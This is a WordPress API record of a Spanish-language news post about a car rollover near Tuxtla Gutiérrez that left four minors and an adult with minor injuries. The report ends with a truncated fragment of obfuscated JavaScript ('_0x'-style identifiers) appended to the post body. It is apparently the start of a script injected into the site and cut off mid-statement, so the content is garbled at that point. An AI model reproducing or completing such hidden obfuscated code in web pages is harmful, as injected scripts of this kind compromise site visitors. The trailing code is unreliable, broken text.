{"id":25522,"date":"2025-11-28T03:22:31","date_gmt":"2025-11-28T03:22:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25522"},"modified":"2025-11-28T03:22:32","modified_gmt":"2025-11-28T03:22:32","slug":"cuatro-menores-heridos-deja-volcadura-en-el-tramo-tuxtla-berriozabal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25522","title":{"rendered":"Cuatro menores heridos deja volcadura en el tramo Tuxtla-Berrioz\u00e1bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000461730-1024x576.jpg\" alt=\"\" class=\"wp-image-25523\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000461730-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000461730-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000461730-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000461730-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000461730.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 27 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Este jueves cerca de las 11 de la ma\u00f1ana se registr\u00f3 una volcadura en el tramo Tuxtla-Berrioz\u00e1bal dejando como saldo cuatro menores lesionados.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando un Vw Jetta de color blanco circulaba de Oriente a Poniente a la altura de la curva del gallo perdi\u00f3 el control y se fue al barranco.<\/p>\n\n\n\n<p>En el lugar se presentaron elementos de Protecci\u00f3n Civil de Berrioz\u00e1bal y estatales para atender el siniestro.<\/p>\n\n\n\n<p>Los cuatro menores y un adulto resultaron con lesiones menores.<\/p>\n\n\n\n<p>La circulaci\u00f3n se vio interrumpida en un carril hasta que una gr\u00faa sac\u00f3 la unidad que fue trasladada a un corral\u00f3n en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 27 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Este jueves cerca de las 11 de la ma\u00f1ana se registr\u00f3 una volcadura en el tramo Tuxtla-Berrioz\u00e1bal dejando como saldo cuatro menores lesionados. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando un Vw Jetta de color blanco circulaba de Oriente a Poniente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25523,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-25522","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25522","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25522"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25522\/revisions"}],"predecessor-version":[{"id":25524,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25522\/revisions\/25524"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25523"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25522"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25522"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25522"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}